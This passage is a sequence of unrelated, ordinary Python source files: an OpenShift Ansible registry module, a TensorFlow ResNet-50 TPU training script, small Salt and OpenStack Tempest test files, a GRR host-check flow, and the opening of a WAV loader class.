        if version_results['returncode'] == 0:
            filtered_vers = Utils.filter_versions(version_results['results'])
            custom_vers = Utils.add_custom_versions(filtered_vers)

            results['returncode'] = version_results['returncode']
            results.update(filtered_vers)
            results.update(custom_vers)

            return results

        raise OpenShiftCLIError('Problem detecting openshift version.')

    @staticmethod
    def run_ansible(params):
        '''run the idempotent ansible code'''
        oc_version = OCVersion(params['kubeconfig'], params['debug'])

        if params['state'] == 'list':

            #pylint: disable=protected-access
            result = oc_version.get()
            return {'state': params['state'],
                    'results': result,
                    'changed': False}

# -*- -*- -*- End included fragment: class/oc_version.py -*- -*- -*-

# -*- -*- -*- Begin included fragment: class/oc_adm_registry.py -*- -*- -*-

class RegistryException(Exception):
    ''' Registry Exception Class '''
    pass


class RegistryConfig(OpenShiftCLIConfig):
    ''' RegistryConfig is a DTO for the registry.  '''
    def __init__(self, rname, namespace, kubeconfig, registry_options):
        super(RegistryConfig, self).__init__(rname, namespace, kubeconfig, registry_options)


class Registry(OpenShiftCLI):
    ''' Class to wrap the oc command line tools '''

    volume_mount_path = 'spec.template.spec.containers[0].volumeMounts'
    volume_path = 'spec.template.spec.volumes'
    env_path = 'spec.template.spec.containers[0].env'

    def __init__(self,
                 registry_config,
                 verbose=False):
        ''' Constructor for Registry

           a registry consists of 3 or more parts
           - dc/docker-registry
           - svc/docker-registry

           Parameters:
           :registry_config:
           :verbose:
        '''
        super(Registry, self).__init__(registry_config.namespace, registry_config.kubeconfig, verbose)
        self.version = OCVersion(registry_config.kubeconfig, verbose)
        self.svc_ip = None
        self.portal_ip = None
        self.config = registry_config
        self.verbose = verbose
        self.registry_parts = [{'kind': 'dc', 'name': self.config.name},
                               {'kind': 'svc', 'name': self.config.name},
                              ]

        self.__prepared_registry = None
        self.volume_mounts = []
        self.volumes = []
        if self.config.config_options['volume_mounts']['value']:
            for volume in self.config.config_options['volume_mounts']['value']:
                volume_info = {'secret_name': volume.get('secret_name', None),
                               'name':        volume.get('name', None),
                               'type':        volume.get('type', None),
                               'path':        volume.get('path', None),
                               'claimName':   volume.get('claim_name', None),
                               'claimSize':   volume.get('claim_size', None),
                              }

                vol, vol_mount = Volume.create_volume_structure(volume_info)
                self.volumes.append(vol)
                self.volume_mounts.append(vol_mount)

        self.dconfig = None
        self.svc = None

    @property
    def deploymentconfig(self):
        ''' deploymentconfig property '''
        return self.dconfig

    @deploymentconfig.setter
    def deploymentconfig(self, config):
        ''' setter for deploymentconfig property '''
        self.dconfig = config

    @property
    def service(self):
        ''' service property '''
        return self.svc

    @service.setter
    def service(self, config):
        ''' setter for service property '''
        self.svc = config

    @property
    def prepared_registry(self):
        ''' prepared_registry property '''
        if not self.__prepared_registry:
            results = self.prepare_registry()
            if not results or ('returncode' in results and results['returncode'] != 0):
                raise RegistryException('Could not perform registry preparation. {}'.format(results))
            self.__prepared_registry = results

        return self.__prepared_registry

    @prepared_registry.setter
    def prepared_registry(self, data):
        ''' setter method for prepared_registry attribute '''
        self.__prepared_registry = data

    def get(self):
        ''' return the self.registry_parts '''
        self.deploymentconfig = None
        self.service = None

        rval = 0
        for part in self.registry_parts:
            result = self._get(part['kind'], name=part['name'])
            if result['returncode'] == 0 and part['kind'] == 'dc':
                self.deploymentconfig = DeploymentConfig(result['results'][0])
            elif result['returncode'] == 0 and part['kind'] == 'svc':
                self.service = Service(result['results'][0])

            if result['returncode'] != 0:
                rval = result['returncode']


        return {'returncode': rval, 'deploymentconfig': self.deploymentconfig, 'service': self.service}

    def exists(self):
        '''does the object exist?'''
        if self.deploymentconfig and self.service:
            return True

        return False

    def delete(self, complete=True):
        '''return all pods '''
        parts = []
        for part in self.registry_parts:
            if not complete and part['kind'] == 'svc':
                continue
            parts.append(self._delete(part['kind'], part['name']))

        # Clean up returned results
        rval = 0
        for part in parts:
            # pylint: disable=invalid-sequence-index
            if 'returncode' in part and part['returncode'] != 0:
                rval = part['returncode']

        return {'returncode': rval, 'results': parts}

    def prepare_registry(self):
        ''' prepare a registry for instantiation '''
        options = self.config.to_option_list(ascommalist='labels')

        cmd = ['registry']
        cmd.extend(options)
        cmd.extend(['--dry-run=True', '-o', 'json'])

        results = self.openshift_cmd(cmd, oadm=True, output=True, output_type='json')
        # probably need to parse this
        # pylint thinks results is a string
        # pylint: disable=no-member
        if results['returncode'] != 0 and 'items' not in results['results']:
            raise RegistryException('Could not perform registry preparation. {}'.format(results))

        service = None
        deploymentconfig = None
        # pylint: disable=invalid-sequence-index
        for res in results['results']['items']:
            if res['kind'] == 'DeploymentConfig':
                deploymentconfig = DeploymentConfig(res)
            elif res['kind'] == 'Service':
                service = Service(res)

        # Verify we got a service and a deploymentconfig
        if not service or not deploymentconfig:
            return results

        # results will need to get parsed here and modifications added
        deploymentconfig = DeploymentConfig(self.add_modifications(deploymentconfig))

        # modify service ip
        if self.svc_ip:
            service.put('spec.clusterIP', self.svc_ip)
        if self.portal_ip:
            service.put('spec.portalIP', self.portal_ip)

        # the dry-run doesn't apply the selector correctly
        if self.service:
            service.put('spec.selector', self.service.get_selector())

        # need to create the service and the deploymentconfig
        service_file = Utils.create_tmp_file_from_contents('service', service.yaml_dict)
        deployment_file = Utils.create_tmp_file_from_contents('deploymentconfig', deploymentconfig.yaml_dict)

        return {"service": service,
                "service_file": service_file,
                "service_update": False,
                "deployment": deploymentconfig,
                "deployment_file": deployment_file,
                "deployment_update": False}

    def create(self):
        '''Create a registry'''
        results = []
        self.needs_update()
        # if the object is none, then we need to create it
        # if the object needs an update, then we should call replace
        # Handle the deploymentconfig
        if self.deploymentconfig is None:
            results.append(self._create(self.prepared_registry['deployment_file']))
        elif self.prepared_registry['deployment_update']:
            results.append(self._replace(self.prepared_registry['deployment_file']))

        # Handle the service
        if self.service is None:
            results.append(self._create(self.prepared_registry['service_file']))
        elif self.prepared_registry['service_update']:
            results.append(self._replace(self.prepared_registry['service_file']))

        # Clean up returned results
        rval = 0
        for result in results:
            # pylint: disable=invalid-sequence-index
            if 'returncode' in result and result['returncode'] != 0:
                rval = result['returncode']

        return {'returncode': rval, 'results': results}

    def update(self):
        '''run update for the registry.  This performs a replace if required'''
        # Store the current service IP
        if self.service:
            svcip = self.service.get('spec.clusterIP')
            if svcip:
                self.svc_ip = svcip
            portip = self.service.get('spec.portalIP')
            if portip:
                self.portal_ip = portip

        results = []
        if self.prepared_registry['deployment_update']:
            results.append(self._replace(self.prepared_registry['deployment_file']))
        if self.prepared_registry['service_update']:
            results.append(self._replace(self.prepared_registry['service_file']))

        # Clean up returned results
        rval = 0
        for result in results:
            if result['returncode'] != 0:
                rval = result['returncode']

        return {'returncode': rval, 'results': results}

    def add_modifications(self, deploymentconfig):
        ''' update a deployment config with changes '''
        # The environment variable for REGISTRY_HTTP_SECRET is autogenerated
        # We should set the generated deploymentconfig to the in memory version
        # the following modifications will overwrite if needed
        if self.deploymentconfig:
            result = self.deploymentconfig.get_env_var('REGISTRY_HTTP_SECRET')
            if result:
                deploymentconfig.update_env_var('REGISTRY_HTTP_SECRET', result['value'])

        # Currently we know that our deployment of a registry requires a few extra modifications
        # Modification 1
        # we need specific environment variables to be set
        for key, value in self.config.config_options['env_vars'].get('value', {}).items():
            if not deploymentconfig.exists_env_key(key):
                deploymentconfig.add_env_value(key, value)
            else:
                deploymentconfig.update_env_var(key, value)

        # Modification 2
        # we need specific volume variables to be set
        for volume in self.volumes:
            deploymentconfig.update_volume(volume)

        for vol_mount in self.volume_mounts:
            deploymentconfig.update_volume_mount(vol_mount)

        # Modification 3
        # Edits
        edit_results = []
        for edit in self.config.config_options['edits'].get('value', []):
            if edit['action'] == 'put':
                edit_results.append(deploymentconfig.put(edit['key'],
                                                         edit['value']))
            if edit['action'] == 'update':
                edit_results.append(deploymentconfig.update(edit['key'],
                                                            edit['value'],
                                                            edit.get('index', None),
                                                            edit.get('curr_value', None)))
            if edit['action'] == 'append':
                edit_results.append(deploymentconfig.append(edit['key'],
                                                            edit['value']))

        if edit_results and not any([res[0] for res in edit_results]):
            return None

        return deploymentconfig.yaml_dict

    def needs_update(self):
        ''' check to see if we need to update '''
        exclude_list = ['clusterIP', 'portalIP', 'type', 'protocol']
        if self.service is None or \
                not Utils.check_def_equal(self.prepared_registry['service'].yaml_dict,
                                          self.service.yaml_dict,
                                          exclude_list,
                                          debug=self.verbose):
            self.prepared_registry['service_update'] = True

        exclude_list = ['dnsPolicy',
                        'terminationGracePeriodSeconds',
                        'restartPolicy', 'timeoutSeconds',
                        'livenessProbe', 'readinessProbe',
                        'terminationMessagePath',
                        'securityContext',
                        'imagePullPolicy',
                        'protocol', # ports.portocol: TCP
                        'type', # strategy: {'type': 'rolling'}
                        'defaultMode', # added on secrets
                        'activeDeadlineSeconds', # added in 1.5 for timeouts
                       ]

        if self.deploymentconfig is None or \
                not Utils.check_def_equal(self.prepared_registry['deployment'].yaml_dict,
                                          self.deploymentconfig.yaml_dict,
                                          exclude_list,
                                          debug=self.verbose):
            self.prepared_registry['deployment_update'] = True

        return self.prepared_registry['deployment_update'] or self.prepared_registry['service_update'] or False

    # In the future, we would like to break out each ansible state into a function.
    # pylint: disable=too-many-branches,too-many-return-statements
    @staticmethod
    def run_ansible(params, check_mode):
        '''run idempotent ansible code'''

        registry_options = {'images': {'value': params['images'], 'include': True},
                            'latest_images': {'value': params['latest_images'], 'include': True},
                            'labels': {'value': params['labels'], 'include': True},
                            'ports': {'value': ','.join(params['ports']), 'include': True},
                            'replicas': {'value': params['replicas'], 'include': True},
                            'selector': {'value': params['selector'], 'include': True},
                            'service_account': {'value': params['service_account'], 'include': True},
                            'mount_host': {'value': params['mount_host'], 'include': True},
                            'env_vars': {'value': params['env_vars'], 'include': False},
                            'volume_mounts': {'value': params['volume_mounts'], 'include': False},
                            'edits': {'value': params['edits'], 'include': False},
                            'tls_key': {'value': params['tls_key'], 'include': True},
                            'tls_certificate': {'value': params['tls_certificate'], 'include': True},
                           }

        # Do not always pass the daemonset and enforce-quota parameters because they are not understood
        # by old versions of oc.
        # Default value is false. So, it's safe to not pass an explicit false value to oc versions which
        # understand these parameters.
        if params['daemonset']:
            registry_options['daemonset'] = {'value': params['daemonset'], 'include': True}
        if params['enforce_quota']:
            registry_options['enforce_quota'] = {'value': params['enforce_quota'], 'include': True}

        rconfig = RegistryConfig(params['name'],
                                 params['namespace'],
                                 params['kubeconfig'],
                                 registry_options)


        ocregistry = Registry(rconfig, params['debug'])

        api_rval = ocregistry.get()

        state = params['state']
        ########
        # get
        ########
        if state == 'list':

            if api_rval['returncode'] != 0:
                return {'failed': True, 'msg': api_rval}

            return {'changed': False, 'results': api_rval, 'state': state}

        ########
        # Delete
        ########
        if state == 'absent':
            if not ocregistry.exists():
                return {'changed': False, 'state': state}

            if check_mode:
                return {'changed': True, 'msg': 'CHECK_MODE: Would have performed a delete.'}

            # Unsure as to why this is angry with the return type.
            # pylint: disable=redefined-variable-type
            api_rval = ocregistry.delete()

            if api_rval['returncode'] != 0:
                return {'failed': True, 'msg': api_rval}

            return {'changed': True, 'results': api_rval, 'state': state}

        if state == 'present':
            ########
            # Create
            ########
            if not ocregistry.exists():

                if check_mode:
                    return {'changed': True, 'msg': 'CHECK_MODE: Would have performed a create.'}

                api_rval = ocregistry.create()

                if api_rval['returncode'] != 0:
                    return {'failed': True, 'msg': api_rval}

                return {'changed': True, 'results': api_rval, 'state': state}

            ########
            # Update
            ########
            if not params['force'] and not ocregistry.needs_update():
                return {'changed': False, 'state': state}

            if check_mode:
                return {'changed': True, 'msg': 'CHECK_MODE: Would have performed an update.'}

            api_rval = ocregistry.update()

            if api_rval['returncode'] != 0:
                return {'failed': True, 'msg': api_rval}

            return {'changed': True, 'results': api_rval, 'state': state}

        return {'failed': True, 'msg': 'Unknown state passed. %s' % state}

# -*- -*- -*- End included fragment: class/oc_adm_registry.py -*- -*- -*-

# -*- -*- -*- Begin included fragment: ansible/oc_adm_registry.py -*- -*- -*-

def main():
    '''
    ansible oc module for registry
    '''

    module = AnsibleModule(
        argument_spec=dict(
            state=dict(default='present', type='str',
                       choices=['present', 'absent']),
            debug=dict(default=False, type='bool'),
            namespace=dict(default='default', type='str'),
            name=dict(default=None, required=True, type='str'),

            kubeconfig=dict(default='/etc/origin/master/admin.kubeconfig', type='str'),
            images=dict(default=None, type='str'),
            latest_images=dict(default=False, type='bool'),
            labels=dict(default=None, type='dict'),
            ports=dict(default=['5000'], type='list'),
            replicas=dict(default=1, type='int'),
            selector=dict(default=None, type='str'),
            service_account=dict(default='registry', type='str'),
            mount_host=dict(default=None, type='str'),
            volume_mounts=dict(default=None, type='list'),
            env_vars=dict(default={}, type='dict'),
            edits=dict(default=[], type='list'),
            enforce_quota=dict(default=False, type='bool'),
            force=dict(default=False, type='bool'),
            daemonset=dict(default=False, type='bool'),
            tls_key=dict(default=None, type='str'),
            tls_certificate=dict(default=None, type='str'),
        ),

        supports_check_mode=True,
    )

    results = Registry.run_ansible(module.params, module.check_mode)
    if 'failed' in results:
        module.fail_json(**results)

    module.exit_json(**results)


if __name__ == '__main__':
    main()

# -*- -*- -*- End included fragment: ansible/oc_adm_registry.py -*- -*- -*-

# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Train a ResNet-50 model on ImageNet on TPU."""

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import csv
import os
import re
import sys
import time

from absl import app
from absl import flags

import tensorflow.compat.v1 as tf

# For Cloud environment, add parent directory for imports
sys.path.append(os.path.dirname(os.path.abspath(sys.path[0])))

from official.resnet import imagenet_input    # pylint: disable=g-import-not-at-top
from official.resnet import resnet_main
from tensorflow.contrib import cluster_resolver as contrib_cluster_resolver
from tensorflow.contrib import tpu as contrib_tpu
from tensorflow.python.estimator import estimator


FLAGS = tf.flags.FLAGS

CKPT_PATTERN = r'model\.ckpt-(?P<gs>[0-9]+)\.data'

flags.DEFINE_string(
    'data_dir_small', default=None,
    help=('The directory where the resized (160x160) ImageNet input data is '
          'stored. This is only to be used in conjunction with the '
          'resnet_benchmark.py script.'))

flags.DEFINE_bool(
    'use_fast_lr', default=False,
    help=('Enabling this uses a faster learning rate schedule along with '
          'different image sizes in the input pipeline. This is only to be '
          'used in conjunction with the resnet_benchmark.py script.'))


# Number of training and evaluation images in the standard ImageNet dataset
NUM_TRAIN_IMAGES = 1281167
NUM_EVAL_IMAGES = 50000


def main(unused_argv):
  tpu_cluster_resolver = contrib_cluster_resolver.TPUClusterResolver(
      FLAGS.tpu, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)

  config = contrib_tpu.RunConfig(
      cluster=tpu_cluster_resolver,
      model_dir=FLAGS.model_dir,
      save_checkpoints_steps=FLAGS.iterations_per_loop,
      keep_checkpoint_max=None,
      tpu_config=contrib_tpu.TPUConfig(
          iterations_per_loop=FLAGS.iterations_per_loop,
          num_shards=FLAGS.num_cores,
          per_host_input_for_training=contrib_tpu.InputPipelineConfig.PER_HOST_V2))  # pylint: disable=line-too-long

  # Input pipelines are slightly different (with regards to shuffling and
  # preprocessing) between training and evaluation.
  imagenet_train = imagenet_input.ImageNetInput(
      is_training=True,
      data_dir=FLAGS.data_dir,
      use_bfloat16=True,
      transpose_input=FLAGS.transpose_input)
  imagenet_eval = imagenet_input.ImageNetInput(
      is_training=False,
      data_dir=FLAGS.data_dir,
      use_bfloat16=True,
      transpose_input=FLAGS.transpose_input)

  if FLAGS.use_fast_lr:
    resnet_main.LR_SCHEDULE = [    # (multiplier, epoch to start) tuples
        (1.0, 4), (0.1, 21), (0.01, 35), (0.001, 43)
    ]
    imagenet_train_small = imagenet_input.ImageNetInput(
        is_training=True,
        image_size=128,
        data_dir=FLAGS.data_dir_small,
        num_parallel_calls=FLAGS.num_parallel_calls,
        use_bfloat16=True,
        transpose_input=FLAGS.transpose_input,
        cache=True)
    imagenet_eval_small = imagenet_input.ImageNetInput(
        is_training=False,
        image_size=128,
        data_dir=FLAGS.data_dir_small,
        num_parallel_calls=FLAGS.num_parallel_calls,
        use_bfloat16=True,
        transpose_input=FLAGS.transpose_input,
        cache=True)
    imagenet_train_large = imagenet_input.ImageNetInput(
        is_training=True,
        image_size=288,
        data_dir=FLAGS.data_dir,
        num_parallel_calls=FLAGS.num_parallel_calls,
        use_bfloat16=True,
        transpose_input=FLAGS.transpose_input)
    imagenet_eval_large = imagenet_input.ImageNetInput(
        is_training=False,
        image_size=288,
        data_dir=FLAGS.data_dir,
        num_parallel_calls=FLAGS.num_parallel_calls,
        use_bfloat16=True,
        transpose_input=FLAGS.transpose_input)

  resnet_classifier = contrib_tpu.TPUEstimator(
      use_tpu=FLAGS.use_tpu,
      model_fn=resnet_main.resnet_model_fn,
      config=config,
      train_batch_size=FLAGS.train_batch_size,
      eval_batch_size=FLAGS.eval_batch_size)

  if FLAGS.mode == 'train':
    current_step = estimator._load_global_step_from_checkpoint_dir(FLAGS.model_dir)  # pylint: disable=protected-access,line-too-long
    batches_per_epoch = NUM_TRAIN_IMAGES / FLAGS.train_batch_size
    tf.logging.info('Training for %d steps (%.2f epochs in total). Current'
                    ' step %d.' % (FLAGS.train_steps,
                                   FLAGS.train_steps / batches_per_epoch,
                                   current_step))

    start_timestamp = time.time()  # This time will include compilation time

    # Write a dummy file at the start of training so that we can measure the
    # runtime at each checkpoint from the file write time.
    tf.gfile.MkDir(FLAGS.model_dir)
    if not tf.gfile.Exists(os.path.join(FLAGS.model_dir, 'START')):
      with tf.gfile.GFile(os.path.join(FLAGS.model_dir, 'START'), 'w') as f:
        f.write(str(start_timestamp))

    if FLAGS.use_fast_lr:
      small_steps = int(18 * NUM_TRAIN_IMAGES / FLAGS.train_batch_size)
      normal_steps = int(41 * NUM_TRAIN_IMAGES / FLAGS.train_batch_size)
      large_steps = int(min(50 * NUM_TRAIN_IMAGES / FLAGS.train_batch_size,
                            FLAGS.train_steps))

      resnet_classifier.train(
          input_fn=imagenet_train_small.input_fn, max_steps=small_steps)
      resnet_classifier.train(
          input_fn=imagenet_train.input_fn, max_steps=normal_steps)
      resnet_classifier.train(
          input_fn=imagenet_train_large.input_fn,
          max_steps=large_steps)
    else:
      resnet_classifier.train(
          input_fn=imagenet_train.input_fn, max_steps=FLAGS.train_steps)

  else:
    assert FLAGS.mode == 'eval'

    start_timestamp = tf.gfile.Stat(
        os.path.join(FLAGS.model_dir, 'START')).mtime_nsec
    results = []
    eval_steps = NUM_EVAL_IMAGES // FLAGS.eval_batch_size

    ckpt_steps = set()
    all_files = tf.gfile.ListDirectory(FLAGS.model_dir)
    for f in all_files:
      mat = re.match(CKPT_PATTERN, f)
      if mat is not None:
        ckpt_steps.add(int(mat.group('gs')))
    ckpt_steps = sorted(list(ckpt_steps))
    tf.logging.info('Steps to be evaluated: %s' % str(ckpt_steps))

    for step in ckpt_steps:
      ckpt = os.path.join(FLAGS.model_dir, 'model.ckpt-%d' % step)

      batches_per_epoch = NUM_TRAIN_IMAGES // FLAGS.train_batch_size
      current_epoch = step // batches_per_epoch

      if FLAGS.use_fast_lr:
        if current_epoch < 18:
          eval_input_fn = imagenet_eval_small.input_fn
        if current_epoch >= 18 and current_epoch < 41:
          eval_input_fn = imagenet_eval.input_fn
        if current_epoch >= 41:  # 41:
          eval_input_fn = imagenet_eval_large.input_fn
      else:
        eval_input_fn = imagenet_eval.input_fn

      end_timestamp = tf.gfile.Stat(ckpt + '.index').mtime_nsec
      elapsed_hours = (end_timestamp - start_timestamp) / (1e9 * 3600.0)

      tf.logging.info('Starting to evaluate.')
      eval_start = time.time()  # This time will include compilation time
      eval_results = resnet_classifier.evaluate(
          input_fn=eval_input_fn,
          steps=eval_steps,
          checkpoint_path=ckpt)
      eval_time = int(time.time() - eval_start)
      tf.logging.info('Eval results: %s. Elapsed seconds: %d' %
                      (eval_results, eval_time))
      results.append([
          current_epoch,
          elapsed_hours,
          '%.2f' % (eval_results['top_1_accuracy'] * 100),
          '%.2f' % (eval_results['top_5_accuracy'] * 100),
      ])

      time.sleep(60)

    with tf.gfile.GFile(os.path.join(FLAGS.model_dir, 'results.tsv'), 'wb') as tsv_file:   # pylint: disable=line-too-long
      writer = csv.writer(tsv_file, delimiter='\t')
      writer.writerow(['epoch', 'hours', 'top1Accuracy', 'top5Accuracy'])
      writer.writerows(results)


if __name__ == '__main__':
  tf.logging.set_verbosity(tf.logging.INFO)
  app.run(main)

from socket import inet_ntoa
from struct import pack


def calcDottedNetmask(mask):
    bits = 0
    for i in xrange(32 - mask, 32):
        bits |= (1 << i)
    packed_value = pack('!I', bits)
    addr = inet_ntoa(packed_value)
    return addr

import pytest
import salt.engines
from tests.support.mock import MagicMock, patch


def test_engine_module_name():
    engine = salt.engines.Engine({}, "foobar.start", {}, {}, {}, {}, name="foobar")
    assert engine.name == "foobar"


def test_engine_title_set():
    engine = salt.engines.Engine({}, "foobar.start", {}, {}, {}, {}, name="foobar")
    with patch("salt.utils.process.appendproctitle", MagicMock()) as mm:
        with pytest.raises(KeyError):
            # The method does not exist so a KeyError will be raised.
            engine.run()
        mm.assert_called_with("foobar")

# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

from tempest.api.volume import base
from tempest.common import utils
from tempest.common import waiters
from tempest import config
from tempest.lib.common.utils import data_utils
from tempest.lib.common.utils import test_utils
from tempest.lib import decorators

CONF = config.CONF


class VolumesActionsTest(base.BaseVolumeTest):
    """Test volume actions"""

    create_default_network = True

    @classmethod
    def resource_setup(cls):
        super(VolumesActionsTest, cls).resource_setup()

        # Create a test shared volume for attach/detach tests
        cls.volume = cls.create_volume()

    @decorators.idempotent_id('fff42874-7db5-4487-a8e1-ddda5fb5288d')
    @decorators.attr(type='smoke')
    @utils.services('compute')
    def test_attach_detach_volume_to_instance(self):
        """Test attaching and detaching volume to instance"""
        # Create a server
        server = self.create_server()
        # Volume is attached and detached successfully from an instance
        self.volumes_client.attach_volume(self.volume['id'],
                                          instance_uuid=server['id'],
                                          mountpoint='/dev/%s' %
                                          CONF.compute.volume_device_name)
        waiters.wait_for_volume_resource_status(self.volumes_client,
                                                self.volume['id'], 'in-use')
        self.volumes_client.detach_volume(self.volume['id'])
        waiters.wait_for_volume_resource_status(self.volumes_client,
                                                self.volume['id'], 'available')

    @decorators.idempotent_id('63e21b4c-0a0c-41f6-bfc3-7c2816815599')
    def test_volume_bootable(self):
        """Test setting and retrieving bootable flag of a volume"""
        for bool_bootable in [True, False]:
            self.volumes_client.set_bootable_volume(self.volume['id'],
                                                    bootable=bool_bootable)
            fetched_volume = self.volumes_client.show_volume(
                self.volume['id'])['volume']
            # Get Volume information
            # NOTE(masayukig): 'bootable' is "true" or "false" in the current
            # cinder implementation. So we need to cast boolean values to str
            # and make it lower to compare here.
            self.assertEqual(str(bool_bootable).lower(),
                             fetched_volume['bootable'])

    @decorators.idempotent_id('9516a2c8-9135-488c-8dd6-5677a7e5f371')
    @utils.services('compute')
    def test_get_volume_attachment(self):
        """Test getting volume attachments

        Attach a volume to a server, and then retrieve volume's attachments
        info.
        """
        # Create a server
        server = self.create_server()
        # Verify that a volume's attachment information is retrieved
        self.volumes_client.attach_volume(self.volume['id'],
                                          instance_uuid=server['id'],
                                          mountpoint='/dev/%s' %
                                          CONF.compute.volume_device_name)
        waiters.wait_for_volume_resource_status(self.volumes_client,
                                                self.volume['id'],
                                                'in-use')
        self.addCleanup(waiters.wait_for_volume_resource_status,
                        self.volumes_client,
                        self.volume['id'], 'available')
        self.addCleanup(self.volumes_client.detach_volume, self.volume['id'])
        volume = self.volumes_client.show_volume(self.volume['id'])['volume']
        attachment = volume['attachments'][0]

        self.assertEqual('/dev/%s' %
                         CONF.compute.volume_device_name,
                         attachment['device'])
        self.assertEqual(server['id'], attachment['server_id'])
        self.assertEqual(self.volume['id'], attachment['id'])
        self.assertEqual(self.volume['id'], attachment['volume_id'])

    @decorators.idempotent_id('d8f1ca95-3d5b-44a3-b8ca-909691c9532d')
    @utils.services('image')
    def test_volume_upload(self):
        """Test uploading volume to create an image"""
        # NOTE(gfidente): the volume uploaded in Glance comes from setUpClass,
        # it is shared with the other tests. After it is uploaded in Glance,
        # there is no way to delete it from Cinder, so we delete it from Glance
        # using the Glance images_client and from Cinder via tearDownClass.
        image_name = data_utils.rand_name(self.__class__.__name__ + '-Image')
        body = self.volumes_client.upload_volume(
            self.volume['id'], image_name=image_name,
            disk_format=CONF.volume.disk_format)['os-volume_upload_image']
        image_id = body["image_id"]
        self.addCleanup(test_utils.call_and_ignore_notfound_exc,
                        self.images_client.delete_image,
                        image_id)
        waiters.wait_for_image_status(self.images_client, image_id, 'active')
        waiters.wait_for_volume_resource_status(self.volumes_client,
                                                self.volume['id'], 'available')

        image_info = self.images_client.show_image(image_id)
        self.assertEqual(image_name, image_info['name'])
        self.assertEqual(CONF.volume.disk_format, image_info['disk_format'])

    @decorators.idempotent_id('92c4ef64-51b2-40c0-9f7e-4749fbaaba33')
    def test_reserve_unreserve_volume(self):
        """Test reserving and unreserving volume"""
        # Mark volume as reserved.
        self.volumes_client.reserve_volume(self.volume['id'])
        # To get the volume info
        body = self.volumes_client.show_volume(self.volume['id'])['volume']
        self.assertIn('attaching', body['status'])
        # Unmark volume as reserved.
        self.volumes_client.unreserve_volume(self.volume['id'])
        # To get the volume info
        body = self.volumes_client.show_volume(self.volume['id'])['volume']
        self.assertIn('available', body['status'])

    @decorators.idempotent_id('fff74e1e-5bd3-4b33-9ea9-24c103bc3f59')
    def test_volume_readonly_update(self):
        """Test updating and retrieve volume's readonly flag"""
        for readonly in [True, False]:
            # Update volume readonly
            self.volumes_client.update_volume_readonly(self.volume['id'],
                                                       readonly=readonly)
            # Get Volume information
            fetched_volume = self.volumes_client.show_volume(
                self.volume['id'])['volume']
            # NOTE(masayukig): 'readonly' is "True" or "False" in the current
            # cinder implementation. So we need to cast boolean values to str
            # to compare here.
            self.assertEqual(str(readonly),
                             fetched_volume['metadata']['readonly'])

#!/usr/bin/env python
"""A flow to run checks for a host."""
from grr.lib import aff4
from grr.lib import flow
from grr.lib import rdfvalue
from grr.lib.checks import checks
from grr.proto import flows_pb2


class CheckFlowArgs(rdfvalue.RDFProtoStruct):
  protobuf = flows_pb2.CheckFlowArgs


class CheckRunner(flow.GRRFlow):
  """This flow runs checks on a host.

  CheckRunner:
  - Identifies what checks should be run for a host.
  - Identifies the artifacts that need to be collected to perform those checks.
  - Orchestrates collection of the host data.
  - Routes host data to the relevant checks.
  - Returns check data ready for reporting.
  """
  friendly_name = "Run Checks"
  category = "/Checks/"
  behaviours = flow.GRRFlow.behaviours + "BASIC"

  @flow.StateHandler(next_state=["MapArtifactData"])
  def Start(self):
    """."""
    client = aff4.FACTORY.Open(self.client_id, token=self.token)
    self.state.Register("knowledge_base",
                        client.Get(client.Schema.KNOWLEDGE_BASE))
    self.state.Register("labels", client.GetLabels())
    self.state.Register("artifacts_wanted", set())
    self.state.Register("artifacts_fetched", set())
    self.state.Register("checks_run", [])
    self.state.Register("checks_with_findings", [])
    self.state.Register("results_store", None)
    self.state.Register("host_data", {})
    self.CallState(next_state="MapArtifactData")

  @flow.StateHandler(next_state=["AddResponses", "RunChecks"])
  def MapArtifactData(self, responses):
    """Get processed data, mapped to artifacts."""
    self.state.artifacts_wanted = checks.CheckRegistry.SelectArtifacts(
        os=self.state.knowledge_base.os)
    # Fetch Artifacts and map results to the artifacts that generated them.
    # This is an inefficient collection, but necessary because results need to
    # be mapped to the originating artifact. An alternative would be to have
    # rdfvalues labeled with originating artifact ids.
    for artifact_id in self.state.artifacts_wanted:
      self.CallFlow("ArtifactCollectorFlow", artifact_list=[artifact_id],
                    request_data={"artifact_id": artifact_id},
                    next_state="AddResponses")
    self.CallState(next_state="RunChecks")

  @flow.StateHandler()
  def AddResponses(self, responses):
    artifact_id = responses.request_data["artifact_id"]
    # TODO(user): Check whether artifact collection succeeded.
    self.state.host_data[artifact_id] = list(responses)

  @flow.StateHandler(next_state=["Done"])
  def RunChecks(self, responses):
    if not responses.success:
      raise RuntimeError("Checks did not run successfully.")
    # Hand host data across to checks. Do this after all data has been collected
    # in case some checks require multiple artifacts/results.
    for finding in checks.CheckHost(self.state.host_data,
                                    os=self.state.knowledge_base.os):
      self.state.checks_run.append(finding.check_id)
      if finding.anomaly:
        self.state.checks_with_findings.append(finding.check_id)
      self.SendReply(finding)


#!/usr/bin/python3
################################################################################
#
#	Copyright 2014 Stjepan Henc <sthenc@gmail.com>
#
#	Licensed under the Apache License, Version 2.0 (the "License");
#	you may not use this file except in compliance with the License.
#	You may obtain a copy of the License at
#
#		http://www.apache.org/licenses/LICENSE-2.0
#
#	Unless required by applicable law or agreed to in writing, software
#	distributed under the License is distributed on an "AS IS" BASIS,
#	WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#	See the License for the specific language governing permissions and
#	limitations under the License.
#
################################################################################

import scipy.io.wavfile as wav
import numpy as np
import copy

class Signal:

    # Data loaders
    def LoadFromFile(self, file):
        self.fs, self.s = wav.read(file)
